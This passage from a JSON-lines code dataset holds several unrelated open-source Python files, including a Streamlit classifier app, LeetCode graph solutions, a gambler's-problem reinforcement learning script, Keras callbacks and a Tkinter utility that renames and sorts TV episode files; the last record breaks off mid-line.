test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\", \"project_idm_push_called\")\ndef test_clone_wrong_env_admin(test, mp):\n env_name = TESTING_ENV_NAME\n 
mp.config(\"authorization.admins\", [test.api_user])\n mp.config(\"environment.name\", env_name)\n result = call_clone_api(test)\n assert result.status_code == http.client.CREATED\n\n test.mock_project({\"id\": \"new-id\", \"name\": \"New name\"}, save=False)\n test.projects.assert_equal()\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/api/project_api/test_clone.py","file_name":"test_clone.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12385938862","text":"## Web\nimport streamlit as st\n## EDA\nimport pandas as pd\n## Visualisasi\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport seaborn as sns\n## Machine Learning\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.metrics import plot_confusion_matrix, classification_report\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import model_selection\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\nclass Web:\n def __init__(self, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n st.title(\"Judul Yang Saya Buat\")\n st.subheader(\"Ini subheader yang saya buat\")\n st.markdown(\"\"\"\n #### Description\n + This is a example EDA \"\"\")\n\n def eda (self, data) -> None:\n st.header(\"Explonatory Data Analysis\")\n if data is not None:\n df = pd.read_csv(data)\n st.write(df)\n\n if st.checkbox(\"Show Shape\"):\n st.write(df.shape)\n \n if st.checkbox(\"Show Columns\"):\n all_columns = df.columns.to_list()\n st.write(all_columns)\n\n if st.checkbox(\"Show Data Null\"):\n st.write(df.isnull().sum())\n \n if st.checkbox(\"Show Duplicate Data\"):\n st.write(df[df.duplicated()])\n \n if st.checkbox(\"Show Description Data\"):\n st.write(df.describe())\n \n if st.checkbox(\"Show Value Counts\"):\n st.write(df.iloc[:-1].value_counts())\n\n if st.checkbox(\"Class Counts Bar Plot\"):\n st.set_option('deprecation.showPyplotGlobalUse', False)\n plt.title(\"Class Count Plot\")\n st.write(sns.countplot(x=df[\"Species\"]))\n st.pyplot()\n\n if st.checkbox(\"Distribution Bar Plot\"):\n all_columns = df.columns.to_list()\n column1 = st.selectbox(\"Select X Column\", all_columns)\n column2 = st.selectbox(\"Select Y Column\", all_columns)\n plt.title(\"Distribution Species\")\n st.write(sns.boxenplot(y=column2, x=column1, data=df, orient='v'))\n st.pyplot()\n\n if st.checkbox(\"Pair Plot\"):\n st.write(sns.pairplot(df, hue=\"Species\"))\n st.pyplot()\n\n if st.checkbox(\"Correlation Plot\"):\n st.write(sns.heatmap(df.corr(), annot=True))\n plt.title(\"Correlation Plot\")\n st.pyplot()\n\n \n st.header(\"Machine Learning Model\")\n X = df.iloc[:,0:-1]\n Y = df.iloc[:,-1]\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n models = []\n models.append(('LR', Pipeline([('scaler', StandardScaler()), ('lr', LogisticRegression())])))\n models.append(('DT', Pipeline([('scaler', StandardScaler()), ('dt', DecisionTreeClassifier())])))\n models.append(('KNN', Pipeline([('scaler', StandardScaler()), ('knn', KNeighborsClassifier())])))\n\n models_name = []\n models_mean = []\n models_std = []\n all_models = []\n scoring = 'accuracy'\n for name, model in models:\n kfold = model_selection.KFold(n_splits=10, random_state=42, shuffle=True)\n cv_result = 
model_selection.cross_val_score(model, X_test, y_test, cv=kfold, scoring=scoring)\n models_name.append(name)\n models_mean.append(cv_result.mean())\n models_std.append(cv_result.std())\n accuracy_result = {\"model name\":name, \"model accuracy mean\": cv_result.mean(), \"model accuracy std\": cv_result.std()}\n all_models.append(accuracy_result)\n\n if st.checkbox(\"Table\"):\n st.dataframe(pd.DataFrame(zip(models_name, models_mean, models_std), columns=[\"Algoritma\", \"Mean\", \"Std\"]))\n \n if st.checkbox(\"JSON\"):\n st.json(all_models)\n\n clf = Pipeline([('sclaer', StandardScaler()), ('dt', DecisionTreeClassifier())])\n clf.fit(X_train, y_train)\n y_pred = clf.predict(X_test)\n\n st.subheader(\"Confusion Matrix\")\n st.set_option('deprecation.showPyplotGlobalUse', False)\n plot_confusion_matrix(clf, X_test, y_test)\n st.pyplot()\n\n st.subheader(\"Classification Report\")\n report = classification_report(y_test, y_pred)\n st.text(report)\n\n st.subheader(\"Check Model\")\n sepal_length = st.slider('Sepal Length', 4.3, 7.9, 5.4)\n sepal_width = st.slider('Sepal Width', 2.0, 4.4, 3.4)\n petal_length = st.slider('Petal Length', 1.0, 6.9, 1.3)\n petal_width = st.slider('Petal Width', 0.1, 2.5, 0.2)\n\n dat = { 'sepal_length':sepal_length,\n 'sepal_width':sepal_width,\n 'petal_length':petal_length,\n 'petal_width':petal_width\n }\n features = pd.DataFrame(dat, index={0})\n st.write(features)\n\n prediction = clf.predict(features)\n prediction_proba = clf.predict_proba(features)\n\n st.subheader('Result')\n st.write(prediction)\n\n st.subheader('Prediction Probability')\n st.write(prediction_proba)\n \n\n\n\n def main(self) -> None:\n data = st.file_uploader(\"Upload file\", type=[\"csv\", \"text\"])\n self.eda(data)\n \n\n\nif __name__ == '__main__':\n app = Web()\n app.main()","repo_name":"kristiyanlaoli/learn-streamlit","sub_path":"learn_streamlit2.py","file_name":"learn_streamlit2.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25335824910","text":"# BFS / DFS / Union-Find / Floyd\n\n# Floyd\nimport collections # 数据类型容器模块\nimport itertools # 为高效循环而创建迭代器的函数\n# Runtime: 36 ms, faster than 86.30% of Python3 online submissions for Evaluate Division.\n# Memory Usage: 13.1 MB, less than 77.62% of Python3 online submissions for Evaluate Division.\nclass Solution:\n def calcEquation(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n quot = collections.defaultdict(dict) # 建图\n for (num, den), val in zip(equations, values): # 填图\n quot[num][num] = quot[den][den] = 1.0\n quot[num][den], quot[den][num] = val, 1 / val\n for i, j, k in itertools.permutations(quot, 3): # 填图\n if i in quot[j] and k in quot[i]:\n quot[j][k] = quot[j][i] * quot[i][k]\n return [quot[num].get(den, -1.0) for num, den in queries] # 获取\n\n\n# Union Find\nclass Solution:\n def calcEquation(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n res = []\n parent = {} # e.g. [\"a\", \"b\"] then parent[a] = b\n weight = {} # e.g. 
a / b then weight[a] = 2.0\n ufind = UnionFind(parent, weight)\n for i, (x1, x2) in enumerate(equations): # union\n if x1 not in parent and x2 not in parent:\n parent[x1], weight[x1] = x2, values[i]\n parent[x2], weight[x2] = x2, 1\n elif x1 not in parent:\n parent[x1], weight[x1] = x2, values[i]\n elif x2 not in parent:\n parent[x2], weight[x2] = x1, 1 / values[i]\n else:\n ufind.union(x1, x2, values[i])\n for x1, x2 in queries: # find\n if x1 not in parent or x2 not in parent or ufind.find(x1) != ufind.find(x2):\n res.append(-1.0)\n else:\n factor1, factor2 = weight[x1], weight[x2]\n res.append(factor1 / factor2)\n return res\n\n\nclass UnionFind(object):\n def __init__(self, parent, weight):\n self.parent = parent\n self.weight = weight\n\n def find(self, vertex): # 查找\n if self.parent[vertex] == vertex: return vertex\n root = self.find(self.parent[vertex])\n self.weight[vertex] *= self.weight[self.parent[vertex]]\n self.parent[vertex] = root\n return root\n\n def union(self, vertex1, vertex2, val): # 联盟\n root1, root2 = self.find(vertex1), self.find(vertex2)\n self.parent[root1] = root2\n self.weight[root1] = self.weight[vertex2] * val / self.weight[vertex1]\n","repo_name":"daidai21/Leetcode","sub_path":"Algorithms/Python3.x/399-Evaluate_Division.py","file_name":"399-Evaluate_Division.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"27389101746","text":"import dv_toolkit as kit\nfrom datetime import timedelta\n\n# Initialize reader\nreader = kit.io.MonoCameraReader(\"/home/kuga/Workspace/tmp-dvstoolkit-v2/data/test-01.aedat4\")\n\n# Get offline MonoCameraData\ndata = reader.loadData()\n\n# Initialize slicer, it will have no jobs at this time\nslicer = kit.MonoCameraSlicer()\n\n# Print events\ndef print_event_info(data):\n print(data[\"events\"])\n\n# Register this method to be called every 33 millisecond of events\nslicer.doEveryTimeInterval(\"events\", timedelta(milliseconds=33), print_event_info)\n\n# Register this method to be called every 2 elements of frames\nslicer.doEveryNumberOfElements(\"frames\", 2, print_event_info)\n\n# Now push the store into the slicer, the data contents within the store\n# can be arbitrary, the slicer implementation takes care of correct slicing\n# algorithm and calls the previously registered callbacks accordingly.\nslicer.accept(data)","repo_name":"KugaMaxx/yam-toolkit","sub_path":"python/samples/data_slicing.py","file_name":"data_slicing.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"37421139494","text":"# import matplotlib;\n#\n# matplotlib.use(\"TkAgg\")\n\nimport gym\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nfrom matplotlib.animation import FuncAnimation\n\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\nclass Gambler(gym.Env):\n \"\"\"\n The gamblers problem from Sutton and Barto 2020 Exercise 4.2\n \"\"\"\n\n def __init__(self, target=100, head_prob=0.3, gamma=1):\n # amount to reach\n self.fig = None\n self.pi_history = []\n self.vi_history = []\n self.gamma = gamma\n self.TARGET = target\n\n # all states, including state 0 and state Target\n self.observation_space = gym.spaces.Discrete(self.TARGET + 1)\n # init initial state\n self.current_state = None\n\n # probability of head\n self.HEAD_PROB = head_prob\n\n # state value array (everywhere zero) - increase 
precision\n # self.state_value = np.zeros(self.observation_space.n, dtype=np.float64)\n # final state value\n\n self.max_action = None\n\n # we have perfect knowledge about the environment - let's define the probabilities\n def actions(state):\n return range(min(state, self.TARGET - state) + 1)\n\n self.P = {s: {a: [] for a in actions(s)} for s in range(self.observation_space.n)}\n\n for state in self.P:\n for action in self.P[state]:\n prob_next_state_and_r = self.HEAD_PROB\n probs = [(prob_next_state_and_r, state + action,\n int(state + action >= self.TARGET),\n state + action >= self.TARGET),\n (1 - prob_next_state_and_r, state - action, 0, state - action <= 0)]\n # terminal states\n if state == self.TARGET:\n probs = [(1, state, 1,\n True)]\n elif state == 0:\n probs = [(1, state, 0,\n True)]\n self.P[state][action] = probs\n # print(self.P)\n\n def step(self, action):\n # if we want to sample from the environment\n\n # get possible actions for current state\n assert (action <= self.max_action) and (action >= 0), \"Action not valid\"\n self.current_state = (self.current_state + action) \\\n if random.random() <= self.HEAD_PROB else (self.current_state - action)\n done = self.current_state >= self.TARGET or self.current_state <= 0\n reward = done\n if not done:\n self.max_action = min(self.current_state, self.TARGET - self.current_state) + 1\n return self.current_state, reward, done, {}\n\n def reset(self, set_state=None):\n if set_state is not None:\n self.current_state = set_state\n else:\n # init returns a random state\n self.current_state = self.observation_space.sample()\n self.max_action = min(self.current_state, self.TARGET - self.current_state) + 1\n return self.current_state\n\n def value_iteration(self):\n # We find the optimal state-value function for the problem\n sweeps_history = []\n n_iter_max = 10000\n # important how accurate the approximation is\n threshold = 1e-20\n # value iteration - increase slightly the accuracy\n state_value = np.zeros(self.observation_space.n, dtype=np.float64)\n for n_iter in range(n_iter_max):\n # On each iteration, copy the value table to the updated_value_table\n updated_value_table = np.copy(state_value)\n sweeps_history.append(updated_value_table)\n _, Q_array, policy_array = self.policy_improvement(state_value)\n self.vi_history.append([state_value,Q_array, policy_array] )\n # Now we calculate Q Value for each actions in the state\n # and update the value of a state with maximum Q value\n\n for state in self.P:\n # initialize the Q table for a state\n Q_table = np.zeros(len(self.P[state]))\n for action in self.P[state]:\n next_states_rewards = []\n for next_sr in self.P[state][action]:\n trans_prob, next_state, reward_prob, done = next_sr\n Q_table[action] += (trans_prob * (\n reward_prob + self.gamma * (state_value[next_state] if not done else 0)))\n state_value[state] = max(Q_table)\n # important what norm is chosen! 
Here we take the taxi-cab norm\n if np.sum(np.fabs(updated_value_table - state_value)) <= threshold:\n sweeps_history.append(state_value)\n _, Q_array, policy_array = self.policy_improvement(state_value)\n self.vi_history.append([state_value, Q_array, policy_array])\n print(f'Value-iteration converged at iteration {(n_iter + 1)}')\n break\n\n return sweeps_history\n\n def policy_improvement(self, state_value=None):\n #\n # if state_value is None:\n # state_value = self.state_value\n # print('start policy improvement')\n # initialize the policy with zeros\n policy = np.zeros(self.observation_space.n)\n Q_array = np.zeros((self.observation_space.n, self.observation_space.n))\n policy_array = np.zeros((self.observation_space.n, self.observation_space.n))\n\n for state in self.P:\n # initialize the Q table for a state\n # Q_table = np.zeros(len(self.P[state]))\n Q_table = np.zeros(len(self.P[state]))\n # compute Q value for all actions in the state\n for action in self.P[state]:\n for next_sr in self.P[state][action]:\n trans_prob, next_state, reward_prob, done = next_sr\n Q_table[action] += (\n trans_prob * (reward_prob + self.gamma * state_value[next_state] * (1 - done)))\n # rounding is important to minimize numerical effects\n Q_table[action] = Q_table[action].round(10)\n Q_array[action, state] = Q_table[action]\n # dont't forget to remove the non-terminal policies - (zero action)\n if len(Q_table) > 1 and not self.gamma < 1:\n indices = np.where(Q_table[1:] == Q_table[1:].max())[0] + 1\n else:\n indices = np.where(Q_table == Q_table.max())[0]\n policy_array[indices, state] = 1\n\n # select the action which has maximum Q value as an optimal action of the state\n # policy[state] = random.choice(indices)\n policy[state] = indices[0]\n # print('Q:\\n', Q_array)\n # print('new policy: ', policy)\n\n # self.plot_current_policy(policy_array, Q_array, state_value, fig=self.fig)\n return policy, Q_array, policy_array\n\n def policy_evaluation(self, policy, state_value=None):\n \"\"\"Inplace policy evaluation. The existence and uniqueness of v are guaranteed as long as either gamma < 1\n or eventual termination is guaranteed from all states under the policy pi. 
We have to exclude actions which\n lead to an infinite horizon or set gamma < 1 \"\"\"\n if state_value is None:\n # initialize value table with zeros\n state_value = np.zeros(self.observation_space.n)\n\n # set the threshold\n threshold = 1e-20\n max_number_sweeps = 20000\n\n for sweep_nr in range(max_number_sweeps):\n delta = 0\n # for each state in the environment, select the action according to the policy and compute the value table\n for state in self.P:\n v = state_value[state]\n action = policy[state]\n # build the value table with the selected action\n state_value[state] = sum([trans_prob * (reward +\n self.gamma * (\n state_value[next_state] * (1 - done)))\n for trans_prob, next_state, reward, done in self.P[state][action]])\n delta = max(delta, abs(v - state_value[state]))\n if delta < threshold: break\n\n return state_value, sweep_nr\n\n def policy_iteration(self):\n # Initialize policy with zeros\n old_policy = np.zeros(self.observation_space.n)\n new_value_function = np.zeros(self.observation_space.n)\n no_of_iterations = 20000\n self.policy_improvement(state_value=np.zeros(self.observation_space.n))\n\n print('start v: ', new_value_function)\n print('start p: ', old_policy)\n for i in range(no_of_iterations):\n\n # compute the value function\n new_value_function, sweep_nr = self.policy_evaluation(old_policy) # , new_value_function)\n print('new v: ', new_value_function, np.mean(new_value_function))\n # Extract new policy from the computed value function\n new_policy, Q_array, policy_array = self.policy_improvement(new_value_function)\n\n self.pi_history.append([new_value_function, Q_array, policy_array])\n # self.update_plot(len(self.history)-1)\n print('new p: ', new_policy)\n # Then we check whether we have reached convergence i.e whether we found the optimal\n # policy by comparing old_policy and new policy if it same we will break the iteration\n # else we update old_policy with new_policy\n\n if (np.all(old_policy == new_policy)):\n print('Policy-Iteration converged at step %d.' 
% (i + 1))\n break\n old_policy = new_policy\n print(\"final p\", new_policy)\n return new_policy\n\n def init_plot(self, fig=None, label=None):\n \"\"\"Create figure for plotting \"\"\"\n if fig is None:\n if self.fig is None:\n self.fig = plt.figure()\n fig = self.fig\n else:\n fig = fig\n\n # dummy elements\n Q_array = np.zeros((self.observation_space.n, self.observation_space.n))\n policy_array = np.zeros((self.observation_space.n, self.observation_space.n))\n state_value = np.zeros(self.observation_space.n)\n\n # ax = plt.subplot(221)\n self.ax1 = plt.subplot2grid((4, 2), (0, 0), rowspan=3, fig=fig)\n ax1 = self.ax1\n ax1.set_xlabel(\"state\")\n ax1.set_ylabel(\"action(state)\")\n extent = (0, self.TARGET, 0, self.TARGET)\n im1 = ax1.imshow(np.flipud(policy_array), cmap=plt.cm.hot, origin='upper', extent=extent)\n ax1.set_ylim(0, int(1 + self.TARGET / 2))\n # ax = plt.subplot(222, sharey=ax)\n self.ax2 = plt.subplot2grid((4, 2), (0, 1), sharey=ax1, rowspan=3)\n ax2 = self.ax2\n im2 = ax2.imshow(np.flipud(Q_array), cmap=plt.get_cmap('turbo'), origin='upper', extent=extent)\n\n divider = make_axes_locatable(ax2)\n self.cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cax = self.cax\n cbar = plt.colorbar(im2, cax=cax)\n cbar.ax.set_ylabel('Q(s,a)')\n ax2.set_xlabel(\"state\")\n ax2.set_ylabel(\"action(state)\")\n # ax = plt.subplot(212)\n self.ax3 = plt.subplot2grid((4, 2), (3, 0), colspan=2)\n ax3 = self.ax3\n # ax.matshow([state_value])\n ax3.plot(state_value)\n ax3.set_xlabel('state')\n ax3.set_ylabel('state value function')\n plt.yticks([])\n\n if label is None:\n label = f'$P_h$={gambler.HEAD_PROB}'\n\n fig.suptitle(label)\n fig.tight_layout()\n self.clear_plot()\n return fig\n\n # def init_func(self):\n # \"\"\"needed for the animation\"\"\"\n # self.ax1.clear()\n # self.ax2.clear()\n # self.ax3.clear()\n # # pass\n # # for ax in self.fig.get_axes():\n # # ax.clear()\n\n def plot_current_policy(self, policy_array, Q_array, state_value, label=None):\n fig = self.fig\n # ax = plt.subplot(221)\n # ax1 = plt.subplot2grid((4, 2), (0, 0), rowspan=3, fig=fig)\n ax1 = self.ax1\n ax1.set_xlabel(\"state\")\n ax1.set_ylabel(\"action(state)\")\n extent = (0, self.TARGET, 0, self.TARGET)\n im1 = ax1.imshow(np.flipud(policy_array), cmap=plt.cm.hot, origin='upper', extent=extent)\n ax1.set_ylim(0, int(1 + self.TARGET / 2))\n # ax = plt.subplot(222, sharey=ax)\n ax2 = self.ax2\n im2 = ax2.imshow(np.flipud(Q_array), cmap=plt.get_cmap('turbo'), origin='upper', extent=extent)\n\n divider = make_axes_locatable(ax2)\n # cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cax = self.cax\n cbar = plt.colorbar(im2, cax=cax)\n cbar.ax.set_ylabel('Q(s,a)')\n ax2.set_xlabel(\"state\")\n ax2.set_ylabel(\"action(state)\")\n # ax = plt.subplot(212)\n ax3 = self.ax3\n # ax.matshow([state_value])\n ax3.plot(state_value)\n ax3.set_xlabel('state')\n ax3.set_ylabel('state value function')\n plt.yticks([])\n\n if label is None:\n label = f'$P_h$={gambler.HEAD_PROB}'\n\n fig.suptitle(label)\n fig.tight_layout()\n\n # self.ims.append([])\n # fig.show()\n def clear_plot(self):\n self.ax1.clear()\n self.ax2.clear()\n self.ax3.clear()\n self.cax.clear()\n\n def update_plot(self, values, iteration):\n self.clear_plot()\n state_value, Q_array, policy_array = values\n self.plot_current_policy(policy_array=policy_array,\n Q_array=Q_array,\n state_value=state_value, label=f'$P_h$={gambler.HEAD_PROB} it: {iteration}')\n # self.fig.show()\n # plt.pause(.1)\n\n\nif __name__ == '__main__':\n from 
matplotlib.animation import FFMpegWriter\n head_prob = 0.4\n target = 30\n\n # matplotlib.use(\"TkAgg\")\n gambler = Gambler(head_prob=head_prob, target=target)\n\n fig = gambler.init_plot()\n gambler.policy_iteration()\n\n metadata = dict(title='Movie Test', artist='Matplotlib',\n comment='Movie support!')\n writer = FFMpegWriter(fps=1, metadata=metadata)\n\n with writer.saving(fig, f'images/Gambler PI head_prob {head_prob} target {target}.mp4', 100):\n for i, values in enumerate(gambler.pi_history):\n gambler.update_plot(values, i)\n fig.show()\n writer.grab_frame()\n\n fig = gambler.init_plot()\n gambler.value_iteration()\n\n with writer.saving(fig, f'images/Gambler VI head_prob {head_prob} target {target}.mp4', 100):\n for i, values in enumerate(gambler.vi_history):\n gambler.update_plot(values, i)\n # fig.show()\n writer.grab_frame()\n\n fig.savefig(f'images/Gambler PI head_prob {head_prob} target {target}.pdf')\n fig.savefig(f'images/Gambler PI head_prob {head_prob} target {target}.png')\n fig.show()\n\n\n","repo_name":"MathPhysSim/GamblersProblem","sub_path":"Gamblers_problem.py","file_name":"Gamblers_problem.py","file_ext":"py","file_size_in_byte":15053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23183897541","text":"'''\n\n\n\n#----------------------------#\n\nhttps://www.cnblogs.com/geaozhang/p/7111961.html\n\n'''\n\nimport time\nfrom termcolor import colored\n\n\ndef main_process():\n t = '''\n q: Python中是如何管理内存的?\n ans: Python有一个私有堆空间来保存所有的对象和数据结构。\n 作为开发者,我们无法访问它,是解释器在管理它。但是有了核心API后,我们可以访问一些工具。\n Python内存管理器控制内存分配。\n\n 另外,内置垃圾回收器会回收使用所有的未使用内存,所以使其适用于堆空间。\n\n \n '''\n print(colored('-'*20, 'red'), t)\n\n a = 123\n b = a\n print(id(a), id(b))\n\n a = 456\n print(id(a), id(b))\n\n a = 1\n b = 1\n print(a is b)\n c = \"good\"\n d = \"good\"\n print(c is d)\n g = []\n h = []\n print(g is h)\n\n import sys\n a = [1, 2, 3]\n print(sys.getrefcount(a), '''当使用某个引用作为参数,传递给getrefcount()时,参数实际上创建了一个临时的引用。\\\n 因此,getrefcount()所得到的结果,会比期望的多1。''')\n b = a\n print(sys.getrefcount(a))\n\n\nif __name__ == \"__main__\":\n tic = time.process_time()\n \n main_process()\n\n toc = time.process_time()\n print(\"time=\",toc - tic)\n\n\n\n\n\n","repo_name":"greatabel/puzzle_I_cracked","sub_path":"4PythonAlgorithmInterview/python_interview/i8py_manage_memory.py","file_name":"i8py_manage_memory.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"zh","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"36089608231","text":"import os\nimport tensorflow as tf\nimport numpy as np\nimport time\nfrom .config_reader import Config_reader\n\n\nclass Callbacks:\n def __init__(self):\n pass\n\n def get_time_stamp(self, filemname):\n timstamp = time.asctime().replace(\" \", \"_\").replace(\":\", '_')\n unique_name = f'{filemname}_at_{timstamp}'\n return unique_name\n\n def get_callbacks(self, X_train, content):\n logs = content['logs']\n unique_dir_name = self.get_time_stamp('tb_logs')\n tensorboard_root_log_dir = os.path.join(logs['logs_dir'], logs['TENSORBOARD_ROOT_LOG_DIR'], unique_dir_name)\n os.makedirs(tensorboard_root_log_dir, exist_ok=True)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(log_dir=tensorboard_root_log_dir)\n file_writer = tf.summary.create_file_writer(logdir=tensorboard_root_log_dir)\n with file_writer.as_default():\n images = np.reshape(X_train[10:30], (\n -1, 28, 28, 1)) # here I've taken 20 images and reshaping it to 1 color nchanger .-1 represents 20\n tf.summary.image(\"20 
handwritten digit samples\", images, max_outputs=25, step=0)\n\n params = content['params']\n early_stopping_callback = tf.keras.callbacks.EarlyStopping(\n patience=params[\"patience\"],\n restore_best_weights=params[\"restore_best_weights\"])\n artifacts = content['artifacts']\n CKPT_dir = os.path.join(artifacts[\"artifacts_dir\"], artifacts[\"CHECKPOINT_DIR\"])\n os.makedirs(CKPT_dir, exist_ok=True)\n CKPT_path = os.path.join(CKPT_dir, \"model_ckpt.h5\")\n\n checkpointing_cb = tf.keras.callbacks.ModelCheckpoint(CKPT_path, save_best_only=True)\n\n return [tensorboard_cb, early_stopping_callback, checkpointing_cb]\n","repo_name":"someshnaman/-ANN-implementation-handwritter_mnist","sub_path":"src/utils/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15585801462","text":"import os\r\nimport os.path\r\nimport shutil\r\nimport re\r\n\r\n\r\ntry:\r\n from Tkinter import *\r\n\r\nexcept ImportError:\r\n import tkinter as tk\r\n import tkinter.ttk as ttk\r\n\r\nbgColor = '#262a30'\r\nugly_patterns = '(?i)(-BTN|720px265|-Snahp|sujaidr|XviD-YL4|XviD-AFG|\\[Kyle-E\\]|-BRISK\\[\\]|-CRAVERS|PRiME|CodeDonut|AC3|DADDY|INTERNAL|2009|hdtv-lol|.HDTV.x264-KILLERS\\[eztv\\]|-BATV|-SVA|X264|.x264-AVS\\eztv\\]|-W4F|x264|-MiNDTHEGAP|-DIMENSION|-AVS|.PROPER|.HDTV.|.x264|.x264-AVS\\[eztv\\]|-KILLERS|-FLEET|\\[eztv\\]|\\[ettv\\]|-FUM)'\r\n\r\n\r\nclass FileCopier():\r\n\r\n def startCopy(self):\r\n dir_files = os.listdir()\r\n print(dir_files)\r\n self.rename_files(dir_files)\r\n self.copy_to_dir()\r\n\r\n def rename_files(self, dir_files):\r\n\r\n whatdo = \"\\t\\t[ RENAMING FILES ] \"\r\n self.textbox.insert(tk.END, whatdo+'\\n')\r\n\r\n print (whatdo)\r\n\r\n for file in dir_files:\r\n if os.path.isfile(file) :\r\n if file.endswith(\".mkv\") or file.endswith(\".avi\") or file.endswith(\".mp4\"):\r\n previous_name = file\r\n\r\n if re.search(ugly_patterns,previous_name):\r\n\r\n previous_name = re.sub(ugly_patterns, '', previous_name)\r\n previous_name = previous_name.split(\".\")\r\n\r\n i = len(file)-3\r\n j = len(file)\r\n\r\n file_ext = {}\r\n file_ext[file] = file[i : j]\r\n\r\n previous_name = \" \".join(previous_name)\r\n new_filename = previous_name[0:i]\r\n x = len(new_filename)-4\r\n\r\n new_filename = new_filename[0: x]\r\n new_filename += \".\" + file_ext[file]\r\n\r\n print(new_filename)\r\n\r\n self.textbox.insert(tk.END,new_filename+'\\n')\r\n new_filename.strip();\r\n os.rename(file,new_filename)\r\n\r\n def copy_to_dir(self):\r\n\r\n whatdo = \"\\n\\t\\t[ COPYING FILES ]\"\r\n src = \"D:\\\\Tv Shows\"\r\n dest_dir = os.listdir(src)\r\n file_list = os.listdir()\r\n\r\n print (whatdo)\r\n self.textbox.insert(tk.END,whatdo+'\\n')\r\n for file in file_list:\r\n if file.endswith(\".mkv\") or file.endswith(\".avi\") or file.endswith(\".mp4\"):\r\n for folder in dest_dir:\r\n\r\n rex = re.escape(folder) + r\".(S[0-9][0-9]| E[0-9][0-9])\"\r\n if re.match(rex,file,re.IGNORECASE) and not os.path.isfile(os.path.join(src,folder)):\r\n\r\n print(src + '\\\\' + folder + \" <- \"+file + \"\\n\")\r\n self.textbox.insert(tk.END, src + '\\\\' + folder + ' <- ' + file + '\\n')\r\n shutil.copy(file,src+\"\\\\\"+folder)\r\n os.remove(file)\r\n\r\n src = \"F:\\\\Tv Shows\"\r\n dest_dir = os.listdir(src)\r\n file_list = os.listdir()\r\n\r\n print (whatdo)\r\n\r\n for file in file_list:\r\n if file.endswith(\".mkv\") or file.endswith(\".avi\") or file.endswith(\".mp4\"):\r\n 
for folder in dest_dir:\r\n\r\n rex = re.escape(folder) + r\".(S[0-9][0-9]| E[0-9][0-9])\"\r\n if re.match(rex,file,re.I) and not os.path.isfile(os.path.join(src, folder)):\r\n\r\n print( src + '\\\\' + folder + \" <- \"+file + \"\\n\")\r\n\r\n self.textbox.insert(tk.END, src + '\\\\' + folder + ' <- ' + file + '\\n')\r\n shutil.copy(file, src+\"\\\\\"+folder)\r\n os.remove(file)\r\n\r\n src = \"E:\\\\Tv Shows\"\r\n dest_dir = os.listdir(src)\r\n file_list = os.listdir()\r\n\r\n print(whatdo)\r\n\r\n for file in file_list:\r\n if file.endswith(\".mkv\") or file.endswith(\".avi\") or file.endswith(\".mp4\"):\r\n for folder in dest_dir:\r\n\r\n rex = re.escape(folder) + r\".(S[0-9][0-9]| E[0-9][0-9])\"\r\n if re.match(rex,file,re.I) and not os.path.isfile(os.path.join(src, folder)):\r\n\r\n print( src + '\\\\' + folder + \" <- \"+file + \"\\n\")\r\n\r\n self.textbox.insert(tk.END, src + '\\\\' + folder + ' <- ' + file + '\\n')\r\n shutil.copy(file, src+\"\\\\\"+folder)\r\n os.remove(file)\r\n\r\n def hello(self):\r\n \r\n pWindow = tk.Tk()\r\n pWindow.config(bg=bgColor)\r\n pTextbox = tk.Text(pWindow,bg=bgColor,fg='#fff')\r\n pTextbox.grid(row=0,column=0,columnspan=2)\r\n pTextbox.insert(tk.END,ugly_patterns)\r\n\r\n startButton = tk.Button(pTextbox,text='add pattern',bg=bgColor,fg='#fff')\r\n patternEntryLabel = tk.Label(pWindow,bg=bgColor,fg='#FFF',text='Add New Pattern:')\r\n patternEntryLabel.grid(row=1,column=0)\r\n patternEntry = tk.Entry(pWindow,bg=bgColor,fg='#fff',width=50)\r\n patternEntry.grid(row=1,column=1)\r\n \r\n\r\n def __init__(self, parent):\r\n\r\n labelframe_color = 'cyan'\r\n parent.wm_title(\"File Copier\")\r\n parent.iconbitmap(r'c:\\Python27\\DLLs\\py.ico')\r\n\r\n labelFrameColor = '#0092bf'\r\n windowWidth = 600\r\n windowHeight = 600\r\n\r\n #patternButton = tk.Button(root, text=\"Patterns\", fg='#FFF', relief=tk.FLAT, bg=bgColor, command=self.hello)\r\n #patternButton.grid(row=0,column=0, sticky='N')\r\n\r\n labelframe0 = tk.LabelFrame(parent, bg=labelframe_color) \r\n startButton = tk.Button(root, text=\"Start\", relief=tk.FLAT, fg=\"#fff\", bg=bgColor, command=self.startCopy)\r\n self.textbox = tk.Text(root, bg=bgColor, fg='#fff', wrap='char', 